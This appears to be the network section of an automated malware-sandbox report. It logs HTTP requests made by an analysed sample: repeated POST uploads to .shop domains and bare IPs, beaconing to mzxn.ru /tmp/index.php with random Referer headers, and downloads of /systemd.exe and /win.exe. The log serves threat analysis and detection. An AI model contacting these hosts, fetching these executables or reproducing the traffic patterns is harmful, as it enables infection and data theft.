Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: liernessfornicsa.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1281Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: liernessfornicsa.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: liernessfornicsa.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 566562Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: liernessfornicsa.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1268Host: liernessfornicsa.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568846Host: liernessfornicsa.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: liernessfornicsa.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crbyycflvhqviag.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rkjvhpickvgumugy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mlolxnvijkbxdkju.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crtrnvacvaqsvh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://igyjobtodmctowt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sowhywcgsmotmk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wathnngxbyoowmd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fcdtsqtavhskibhj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: mzxn.ru
Source: global traffic HTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gepaukacbiyo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uuinbvqevufc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewndxwxqsldh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pcatlfkkstdxqqw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cxcsmobdatpu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: mzxn.ru
Source: global traffic HTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qnawhflyfaljta.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://soaxpgcflilwcjk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jtecgpbonqhjbs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kriqrmlnqypou.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: mzxn.ru
